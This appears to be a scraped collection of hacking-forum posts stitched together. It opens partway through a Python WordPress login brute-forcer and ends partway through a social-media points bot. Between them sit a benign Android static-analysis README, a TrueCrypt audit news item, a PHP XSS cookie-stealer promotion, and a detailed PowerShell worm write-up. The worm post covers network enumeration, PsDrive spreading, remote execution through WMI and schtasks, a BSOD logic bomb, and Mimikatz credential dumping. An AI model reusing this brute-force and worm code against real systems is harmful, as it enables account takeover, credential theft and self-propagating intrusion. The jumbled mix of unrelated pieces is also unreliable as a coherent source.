AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9', 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'] UA = random.choice(userAgent) return UA def urlCMS(url,brutemode): if url[:8] != "https://" and url[:7] != "http://": print('\n[X] You must insert http:// or https:// procotol') os._exit(1) # Page login if brutemode == "std": url = url+'/wp-login.php' else: url = url+'/xmlrpc.php' return url def bodyCMS(username,pwd,brutemode): if brutemode == "std": body = { 'log':username, 'pwd':pwd, 'wp-submit':'Login', 'testcookie':'1' } else: body = """<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName> <params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>""" % (username, pwd) return body def headersCMS(UA,lenbody,brutemode): if brutemode == "std": headers = { 'User-Agent': UA, 'Content-type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' } else: headers = { 'User-Agent': UA, 'Content-type': 'text/xml', 'Content-Length': "%d" % len(lenbody)} return headers def responseCMS(response): if response['set-cookie'].split(" ")[-1] == "httponly": return "1" def connection(url,user,password,UA,timeout,brutemode): username = user pwd = password http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True) # HTTP POST Data body = bodyCMS(username,pwd,brutemode) # Headers headers = headersCMS(UA,body,brutemode) try: if brutemode == "std": response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body)) if str(response.status)[0] == "4" or str(response.status)[0] == "5": print('[X] HTTP error, code: '+str(response.status)) os._exit(1) if responseCMS(response) == "1": print('\n') print('[!] Password FOUND!!!') print('') print('[!] Username: '+user+' Password: '+password) os._exit(0) checkCon = "OK" return checkCon else: response, content = http.request(url, 'POST', headers=headers, body=body) if str(response.status)[0] == "4" or str(response.status)[0] == "5": print('[X] HTTP error, code: '+str(response.status)) os._exit(1) # Remove all blank and newline chars xmlcontent = content.replace(" ", "").replace("\n","") if not "403" in xmlcontent: print('\n') print('[!] Password FOUND!!!') print('') print('[!] Username: '+user+' Password: '+password) os._exit(0) checkCon = "OK" return checkCon except socket.timeout: print('[X] Connection Timeout') os._exit(1) except socket.error: print('[X] Connection Refused') os._exit(1) except httplib.ResponseNotReady: print('[X] Server Not Responding') os._exit(1) except httplib2.ServerNotFoundError: print('[X] Server Not Found') os._exit(1) except httplib2.HttpLib2Error: print('[X] Connection Error!!') os._exit(1) commandList = argparse.ArgumentParser(sys.argv[0]) commandList.add_argument('-S', '--standard', action="store_true", dest="standard", help="Standard login brute", ) commandList.add_argument('-X', '--xml-rpc', action="store_true", dest="xml", help="Xml-rpc login brute", ) commandList.add_argument('-t', '--target', action="store", dest="target", help="Insert URL: http://www.victimurl.com[:port]", ) commandList.add_argument('-u', '--username', action="store", dest="username", help="Insert username", ) commandList.add_argument('-w', '--wordfilelist', action="store", dest="wordfilelist", help="Insert wordlist file", ) commandList.add_argument('--timeout', action="store", dest="timeout", default=10, type=int, help="Timeout Value (Default 10s)", ) options = commandList.parse_args() # Check bruteforce mode conflicts if options.standard and options.xml: print "\n[X] Select standard [-S] OR xml-rpc ] bruteforce mode" sys.exit(1) # Check args if not options.standard and not options.xml: print(banner) print commandList.print_help() sys.exit(1) elif not options.target or not options.username or not options.wordfilelist: print(banner) print commandList.print_help() sys.exit(1) # Set bruteforce mode if options.standard: brtmd="std" else: brtmd="xml" # args to vars url = options.target user = options.username password = options.wordfilelist timeout = options.timeout # Check if Wordlist file exists and has readable if not os.path.isfile(password) and not os.access(password, os.R_OK): print "[X] Wordlist file is missing or is not readable" sys.exit(1) # Open and read Wordlist file wordlist = open(password).read().split("\n") # Remove last empty values from wordlist list del wordlist[-1] # Total lines (password) in Wordlist file totalwordlist = len(wordlist) # Gen Random UserAgent UA = randomAgentGen() # Url to url+login_cms_page url = urlCMS(url,brtmd) print(banner) print print('[+] Target.....: '+options.target) print('[+] Wordlist...: '+str(totalwordlist)) print('[+] Username...: '+user) if brtmd == "std": print('[+] BruteMode..: Standard') else: print('[+] BruteMode..: Xml-Rpc') print('[+]') print('[+] Connecting.......') print('[+]') # Check connection with fake-login if connection(url,user,UA,UA,timeout,brtmd) == "OK": print('[+] Connection established') # Reset var for "progress bar" count = 0 threads = [] for pwd in wordlist: count += 1 t = Thread(target=connection, args=(url,user,pwd,UA,timeout,brtmd)) t.start() threads.append(t) sys.stdout.write('\r') sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist)) sys.stdout.flush() sleep(0.210) for a in threads: a.join() # no passwords found print('\n[X] Password NOT found ') WordPress Brute Forcer 2.0 ? Packet Storm

Phishing Dark Waters The Offensive and Defensive Sides of Malicious Emails Authors: Cristopher Hadnagy Michelete Fincher Foreword by ROBIN DREEKE Download: https://www.scribd.com/doc/261558462/Phishing-Dark-Waters-The-Offensive-and-Defensive-Sides-of-Malicious-Emails

README.rst ========================================= Static Code Analysis for Smali ========================================= If you ever have looked at Android applications you know to appreciate the ability of analyzing your target at the most advanced level. Dynamic programm analysis will give you a pretty good overview of your applications activities and general behaviour. However sometimes you'll want to just analyze your application **without** running it. You'll want to have a look at its components, analyze how they interact and how data is tainted from one point to another. This is was the major factor driving the development of *smalisca*. There are indeed some good reasons for a *static code analysis* before the *dynamic* one. Before interacting with the application I like to know how the application has been build, if there is any API and generate all sort of *call flow graphs*. In fact graphs have been very important to me since they *visualize* things. Instead of jumping from file to file, from class to class, I just look at the graphs. While graph building has been an important reason for me to code such a tool, *smalisca* has some other neat **features** you should read about. Features ======== At the moment there are some few major functionalities like: * **parsing** You can parse a whole directory of **Smali** files and **extract**: * class information * class properties * class methods * calls between methods of different classes You can then **export** the results as **JSON** or **SQLite**. Have a loot at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for more information. * **analyzing** After exporting the results you'll get an **interactive prompt** to take a closer look at your parsed data. You can **search** for classes, properties, methods and even method calls. You can then apply several **filters** to your search criterias like:: smalisca> sc -c class_name -p test -r 10 -x path -s class_type This command will search for *10* (-r 10) classes which contain the pattern *test* (-p) in their *class name* (-c). Afterwards the command will exclude the column *path* (-x path) from the results and sort them by the *class type* (-s). Let's have a look at another example:: smalisca> scl -fc com/android -fm init -r 10 This will search for all **method calls** whose *calling* class name contains the pattern *com/android* (-fc). Additionally we can look for calls originating from methods whose name contain the pattern *init* (-fm). You can of course read your commands from a file and analyze your results in a *batch*- like manner:: $ cat cmd.txt sc -c class_name -p com/gmail/xlibs -r 10 -x path quit $ ./smalisca.py analyzer -i results.sqlite -f sqlite -c cmd.txt ... Have a loot at the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more information. * **visualizing** I think this the **most** valuable feature of *smalisca*. The ability to visualize your results in a structured way makes your life more comfortable. Depending on what you're interested in, this tool has several graph drawing features I'd like to promote. At first you can draw your packages including their classes, properties and methods:: smalisca> dc -c class_name -p test -f dot -o /tmp/classes.dot :: INFO Wrote results to /tmp/classes.dot smalisca> This will first search classes whose class name contains *test* and then export the results in the **Graphviz DOT** language. You can then manually generate a graph using *dot*, *neato*, *circo* etc. Or you do that using the interactive prompt:: smalisca> dc -c class_name -p test -f pdf -o /tmp/classes.pdf --prog neato :: INFO Wrote results to /tmp/classes.pdf smalisca> Have a loot at the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for more information. Screenshots =========== .. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_search_classes.png :scale: 99% :alt: Basic usage Output results as table. .. figure:: http://smalisca.readthedocs.org/en/latest/_images/smalisca_dxcl_dot_0.png :scale: 99% :alt: Cross calls Basic relationships between classes and modules. Have a look at the `screenshots page <http://smalisca.readthedocs.org/en/latest/screenshots.html>`_. Installation ============ Refer to the `installation page <http://smalisca.readthedocs.org/en/latest/installation.html>`_. Requirements: * Python (2.x / 3.x) * `cement <http://builtoncement.com/>`_ * Graphviz * SQLAlchemy How to use it ============= After installing the tool, you may want to first pick up an Android application (APK) to play with. Use `apktool <https://code.google.com/p/android-apktool/>`_ or my own tool `ADUS <https://github.com/dorneanu/adus>`_ to dump the APKs content. For the sake of simplicity I'll be using **FakeBanker** which I've analyzed in a previous `blog post <http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/>`_. First touch ----------- But first let's have a look at the tools main options:: $ smalisca --help ___ /\_ \ __ ____ ___ ___ __ \//\ \ /\_\ ____ ___ __ /',__\ /' __` __`\ /'__`\ \ \ \ \/\ \ /',__\ /'___\ /'__`\ /\__, `\/\ \/\ \/\ \/\ \L\.\_ \_\ \_\ \ \/\__, `\/\ \__//\ \L\.\_ \/\____/\ \_\ \_\ \_\ \__/.\_\/\____\\ \_\/\____/\ \____\ \__/.\_\ \/___/ \/_/\/_/\/_/\/__/\/_/\/____/ \/_/\/___/ \/____/\/__/\/_/ -------------------------------------------------------------------------------- :: Author: Victor <Cyneox> Dorneanu :: Desc: Static Code Analysis tool for Smali files :: URL: http://nullsecurity.net, http://{blog,www}.dornea.nu :: Version: 1.0 -------------------------------------------------------------------------------- usage: smalisca.py (sub-commands ...) [options ...] {arguments ...} [--] Static Code Analysis (SCA) tool for Baskmali (Smali) files. commands: analyzer [--] Analyze results using an interactive prompt or on the command line. parser [--] Parse files and extract data based on Smali syntax. optional arguments: -h, --help show this help message and exit --debug toggle debug output --quiet suppress all output --log-level {debug,info,warn,error,critical} Change logging level (Default: info) -v, --version show program's version number and exit Parsing ------- I'll first **parse** some directory for **Smali** files before doing the analysis stuff:: $ smalisca parser -l ~/tmp/FakeBanker2/dumped/smali -s java -f sqlite -o fakebanker.sqlite ... :: INFO Parsing .java files in /home/victor/tmp/FakeBanker2/dumped/smali ... :: INFO Finished parsing! :: INFO Exporting results to SQLite :: INFO Extract classes ... :: INFO Extract class properties ... :: INFO Extract class methods ... :: INFO Extract calls ... :: INFO Commit changes to SQLite DB :: INFO Wrote results to fakebanker.sqlite :: INFO Finished scanning Also have a look at the `parsing page <http://smalisca.readthedocs.org/en/latest/parsing.html>`_ for further information. Analyzing ---------- Now you're free to do whatever you want with your generated exports. You can inspect the **SQLite DB** directly or use *smaliscas* **analysis** features:: $ smalisca analyzer -f sqlite -i fakebanker.sqlite ... smalisca>sc -x path -r 10 +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+ | id | class_name | class_type | class_package | depth | +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+ | 1 | Landroid/support/v4/net/ConnectivityManagerCompat | public | Landroid.support.v4.net | 5 | | 2 | Landroid/support/v4/view/AccessibilityDelegateCompat$AccessibilityDelegateJellyBeanImpl | | Landroid.support.v4.view | 5 | | 3 | Landroid/support/v4/view/ViewCompat$ViewCompatImpl | interface abstract | Landroid.support.v4.view | 5 | | 4 | Landroid/support/v4/app/ActivityCompatHoneycomb | | Landroid.support.v4.app | 5 | | 5 | Landroid/support/v4/app/NoSaveStateFrameLayout | | Landroid.support.v4.app | 5 | | 6 | Landroid/support/v4/net/ConnectivityManagerCompatHoneycombMR2 | | Landroid.support.v4.net | 5 | | 7 | Lcom/gmail/xpack/BuildConfig | public final | Lcom.gmail.xpack | 4 | | 8 | Landroid/support/v4/app/BackStackRecord$Op | final | Landroid.support.v4.app | 5 | | 9 | Landroid/support/v4/app/FragmentManagerImpl | final | Landroid.support.v4.app | 5 | | 10 | Landroid/support/v4/app/ShareCompat$ShareCompatImpl | interface abstract | Landroid.support.v4.app | 5 | +----+-----------------------------------------------------------------------------------------+--------------------+--------------------------+-------+ Also refer to the `analysis page <http://smalisca.readthedocs.org/en/latest/analysis.html>`_ for more available **commands** and options. Drawing ------- Please refer to the `drawing page <http://smalisca.readthedocs.org/en/latest/drawing.html>`_ for full examples. License ======== *smalisca* has been released under the **MIT** license. Have a look at the **LICENSE.rst** file. Credits ======= This tool is dedicated to **Lic?**. Many thanks also go to: * `Stephen McAllister <https://de.linkedin.com/pub/stephen-mcallister/13/843/71a>`_ * Many thanks for all those hours full of APK debugging and great ideas * My gf * Thank you very much for your patience and understanding! * `nullsecurity.net <http://nullsecurity.net>`_ * Hack the planet! Download: smalisca-0.1.tar.gz Description: Static Code Analysis tool for Smali files. MD5: 943930dbd144c52635f3d5b874482d3a Author: Cyneox

Cookies Manager Author: Doddy Hackman A simple program in PHP to help with XSS vulnerability in this program are the following: [+] Cookie Stealer with TinyURL Generator [+] Can you see the cookies that brings back a page [+] Can create cookies with information they want [+] Hidden to login to enter Panel use ?poraca to find the login A video with examples of use: Download Source: https://github.com/DoddyHackman/Cookies_Manager

https://rstforums.com/forum/35905-370-links.rst

update, aprox. 20k https://www.sendspace.com/file/5v8ix9 pwd: cnN0Zm9ydW1zLmNvbQ== Enjoy!

TL;DR: Another Powershell Worm here. Recently, I was approached with a few ideas about worms to test the potential to detect/stop such. This, and reading some interesting posts about PowerShell based worm(s), pushed me to attempt to build a worm with a slightly different take. One of the requirements of this worm is to propagate without certainty of an external connection or not to the internet. This is important if the worm is to jump across an airgap’d network somehow or if the command and control is severed. Also, attempting to dump creds and setting some sort of persistence would be a plus. Lastly, the whole thing (or as much as possible) should be written in powershell, so the option of base64 encoding it and running it in memory is present. Target enumeration This is a pick your own adventure technique. First, the worm will need to identify potential targets to spread to. The worm uses 3 techniques (others may exist) to enumerate targets: Dump domain hosts grab local class C grab IPs from netstat As annotated in an earlier post, we can cycle domain hosts pretty easily if we are logged into a domain via: function getDomain { $final = @() #get Domain computers $strCategory = "computer" $objDomain = New-Object System.DirectoryServices.DirectoryEntry $objSearcher = New-Object System.DirectoryServices.DirectorySearcher $objSearcher.SearchRoot = $objDomain $objSearcher.Filter = ("(objectCategory=$strCategory)") $colProplist = "name", "cn" foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)} $colResults = $objSearcher.FindAll() foreach ($objResult in $colResults) { $objComputer = $objResult.Properties $bleh = $objComputer.name $final += $bleh } return $final } But what if the victim host isn’t a part of a domain? This will fail, so error handling will be useful here (see final version at the top of the page). The next attempt to enumerate hosts is a class c brute force. To set this up, the worm needs to know the current IP address of the machine we are on, a la: $enum = Get-WMIObject win32_NetworkAdapterConfiguration | Where-Object { $_.IPEnabled -eq $true } | Foreach-Object { $_.IPAddress } | Foreach-Object { [IPAddress]$_ } | Where-Object { $_.AddressFamily -eq 'Internetwork' } | Foreach-Object { $_.IPAddressToString } Then, the worm parses the first 3 octets and runs through a for loop (assumes /24 at the moment): function getClassC{ Param($ip); $final = @() $classC = $ip.Split(".")[0]+"."+$ip.Split(".")[1]+"."+$ip.Split(".")[2] for($i=1; $i -lt 255; $i++) { $final += $classC + $i.ToString() } return $final } Lastly, the worm will try a netstat “hail mary”: #//netstat mode $n = netstat -ano foreach ($n2 in $n) { $n4= $n2.Split(" ") foreach ($n3 in $n4) { $n5 = $n3.Split(":")[0] if (($n5.Length -gt 7) -and ($n5.Length -lt 22)) { if (!( ($n5 -eq "0.0.0.0") -or ($n5 -eq $ip) -or ($n5 -eq "127.0.0.1") ) ) { if ($n5.Contains(".")) { Write-Host $n5 $final += $n5 } } } } } Spreading technique In the testing environment, we were able to spread using the various techniques, but for simplicity we will discuss PsDrive (additional techniques may be used). The credentials used to run the worm as (or lack thereof) will dictate what is available. PsDrive can set up a powershell accessible share much like net share, except that this share is only viewable in powershell! Screenshot of successfully created PS-Drive that does not show up under net use. Here, the worm sets up the PsDrive to copy files over, moves the files to the destination (via C$ in our example, but others shares may exist): $prof = "USERPROFILE" $profile = (get-item env:$prof).Value +"\Downloads" $pro1 = $profile.SubString(3, $profile.Length-3) $psdrive = "\\"+$nethost+"\C$\"+ $pro1 New-PsDrive -Name Y -PsProvider filesystem -Root $psdrive Next, the worm (and any additional scripts) are copied over: Copy-Item $profile\PowerW0rm.ps1 Y:\PowerW0rm.ps1 Copy-Item $profile\PowerW0rm.mof Y:\PowerW0rm.mof Copy-Item $profile\Invoke-Mimikatz.ps1 Y:\Invoke-Mimikatz.ps1 Copy-Item $profile\bypassuac-x64.exe Y:\bypassuac-x64.exe Finally, since this code is running in a loop, the worm removes the PsDrive: Remove-PsDrive Y Code Execution By default in a Windows 7/Server 2008 R2 environment, Remote Powershell isn’t enabled by default. However, other options do exist depending on access level and GPO settings. The worm uses two methods of code execution: schtasks and Invoke-WMIMethod (others will exist, such as Invoke-Command). Some of the examples can be found below: $run = "powershell -exec Bypass "+$profile+"\\PowerWorm.ps1" $task = $profile+"\\bypassuac-x64.exe /C powershell.exe -exec Stop-Process csrss" # BSOD for a logic bomb #run with dump creds Invoke-WMIMethod -Class Win32_Process -Name Create -Authentication PacketPrivacy -Computername $nethost -Credential $cred -Impersonation Impersonate -ArgumentList $run #run as current user Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList $run #schtask example schtasks /CREATE /S $nethost /SC Daily /MO 1 /ST 00:01 /TN "update54" /TR $task /F #scheduled for the 1st of the year @ 00:01 AM schtasks /RUN /TN "update54" #Runs task immediately (kills worm, but just PoC) schtasks /DEL /TN "update54" #would never run in this context, but is an example Credential Harvesting The worm uses a call to Invoke-Mimikatz.ps1 from the PowerSploit project to dump and parse creds as it jumps from machine to machine. This is achieved will a slight modification to the very end of Invoke-Mimikatz.ps1: $creds = Invoke-Mimikatz -dumpcreds Write-Host $creds The worm first calls Invoke-Minikatz: #try to grab creds $scriptPath = split-path -parent $MyInvocation.MyCommand.Definition $scriptPath = $scriptPath + "\Invoke-Mimikatz.ps1 -dumpcreds" $creds = "powershell.exe -exec Bypass " + $scriptPath $creds_str = runCMD $creds Followed by some nifty regex to extract just username and password from output: $creds_regex= @" .*\*\sUsername.* .*\*\sDomain.* .*\*\sPassword.* "@ $creds_str = $creds -replace " ", "`r`n" $cred_store = @{} $found = new-object System.Text.RegularExpressions.Regex($creds_regex, [System.Text.RegularExpressions.Regexoptions]::Multiline) $m=$found.Matches($creds_str) And finally, some last minute parsing which trims the strings to exactly what is needed: function parsed() { Param([string]$str1) $p1 = $str1 -split '[\r\n]' $parse=@() for ($j=0; $j -lt 3; $j++) { $num = $j*2 $p2 = $p1[$num].split(":") #Write-Host $j "," $num "," $p2 $p3 = $p2[1] $parse+= , $p3 } return $parse } Additional thoughts At the top of the post, as well as here, is a link for the complete PoC PowerWorm.ps1. It works well on Vista/7, but there seem to be a few bugs trying run this against XP/8 (due to an error with Invoke-Mimikatz). I used something very similar after gaining domain admin credentials, then began laterally moving in an environment where psexec/winrm/pass-the-hash tricks did not seem to work. I did have some issues (duh) with this worm hammering the DC because there is no check in place to see if the worm had already ran on a host, and the DC is the first host in the domain hosts array! The fix for this issue is left as an exercise for the reader. Also, this script could be easily modified to roll out other files/scripts/binaries across a domain automatically-which I also did trying to push traffic generation scripts for testing at a later date, but that story is for another post. Source: https://khr0x40sh.wordpress.com/2014/11/13/powershell-worm/

The Security audit of TrueCrypt disk-encryption software has been completed, with no evidence of any critical design vulnerabilities or deliberate backdoors in its code. TrueCrypt -- one of the world's most-used open source file encryption software used by Millions of privacy and security enthusiasts -- is being audited from past two years by a team of security researchers to assess if it could be easily exploited and cracked. Hopefully, it has cleared the second phase of the audit. TrueCrypt is a free, open-source and cross-platform encryption program available for Windows, OSX and Linux that can be used to encrypt individual folders or encrypt entire hard drive partitions including the system partition. NO NSA BACKDOORS Security Auditors and Cryptography Experts at NCC took an initiative to perform a public information security audit of TrueCrypt in response to the concerns that National Security Agency (NSA) may have tampered with it, according to a leaked classified document by Edward Snowden. TrueCrypt cleared the first phase of the audit that reviewed the blueprints of the software and given a relatively clean bill of health almost a year ago. At the first phase, auditors discovered 11 issues of medium and low severity in the software. Now, the auditors from NCC Group’s Cryptography and security audit Services have finalized and published the 21-page Open Cryptographic report related to the second phase of audit that examined TrueCrypt's implementation of random number generators and critical key algorithms, and various encryption cipher suites. FOUR VULNERABILITIES DISCOVERED The report uncovered four vulnerabilities in the latest original version of the software, but none of them could lead to a bypass of confidentiality or let hackers use deformed inputs to subvert TrueCrypt. The vulnerabilities are given below: Keyfile mixing is not cryptographically sound -- Low severity Unauthenticated ciphertext in volume headers -- Undetermined CryptAcquireContext may silently fail in unusual scenarios -- High severity AES implementation susceptible to cache timing attacks -- High severity The most critical of the four vulnerabilities involved the use of Windows API to generate random numbers used by master cryptographic key. A separate vulnerability with undetermined severity checks for the volume header decryption was susceptible to tampering. Also, a low severity flaw for a method used to mix the entropy of keyfiles was not cryptographically sound. Another high severity flaw identified refers to "several included AES implementations that may be vulnerable to cache-timing attacks." Source: thehackernews.com

AddMeFast-Bot Automating the process of liking/subscribing/viewing etc... on addmefast.com in order to get points and benefit from their service Update: now working anymore, 01-10-2015 import mechanizeimport re from time import sleep import threading #cut something in many parts def chunkIt(seq, num): avg = len(seq) / float(num) out = [] last = 0.0 while last < len(seq): out.append(seq[int(last):int(last + avg)]) last += avg return out #generates a browser def genbrowser(): br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_redirect(True) br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.6.5')] return br class AMB(threading.Thread): # define environment variable def __init__(self, rangex, user, passw): self.br1 = genbrowser() self.alogin(self.br1, user, passw) self.range = rangex threading.Thread.__init__(self) self.timeout_value = 30 # log the user in def alogin(self, br, user, passw): br.open('http://addmefast.com', \ 'email={0}&password={1}&login_button=Login'.format(user.replace('@','%40'), passw)) if 'Welcome' in br.response().read(): print "Login successful on add me fast" #main function def run(self): sleep(1) for i in self.range: try: #goes to a page with many links to like #self.br1.open( #act=getLinksList&params={"network":"1", "page":"1", "isFBpage":"1"} self.br1.open( 'http://addmefast.com/includes/ajax.php', 'act=getLinksList&params={"network":"1", "page":"%s", "isFBpage":"1"}' % (i),timeout=self.timeout_value) #gets this : title="http://www.facebook.com/Ocacadordetrolls" id="L_b89734d43ed3a3dce20eeaab183365 page_and_Lid = re.findall('div class="freepts_row" title="(.*)" id="(.*)["]{1}>', self.br1.response().read()) #confirmSubscribe(162255, "http://www.facebook.com/TOKZ.cs", "02c08e63ec34b4c0b562ed71162255", "1", 0, "UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"); number_and_token = re.findall("""getFBLikesBef\((.*)[,]{1} ".*["]{1}, ".*["]{1}, "1", 0, "(.*)["]{1}\);""", self.br1.response().read()) i = 0 while i < len(page_and_Lid): page = page_and_Lid[0] Lid = page_and_Lid[1] number = number_and_token[0] token = number_and_token[1] #http://addmefast.com/includes/ajax.php, act=checkFollowed&params={"id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1"} self.br1.open('http://addmefast.com/includes/ajax.php','act=checkFollowed&params={"id":"%s", "url":"%s", "network":"1"}' % (number, page),timeout=self.timeout_value) #http://addmefast.com/includes/ajax.php, act=updateAction&params={"link_id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1", "IXY5pZpE":"UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"} self.br1.open('http://addmefast.com/includes/ajax.php','act=updateAction&params={"link_id":"%s", "url":"%s", "network":"1", "IXY5pZpE":"%s"}' % (Lid, page, token),timeout=self.timeout_value) print "New shit made" i+=1 except Exception, e: print e if __name__=='__main__': nbthreads = input('Number of threads: ') z = 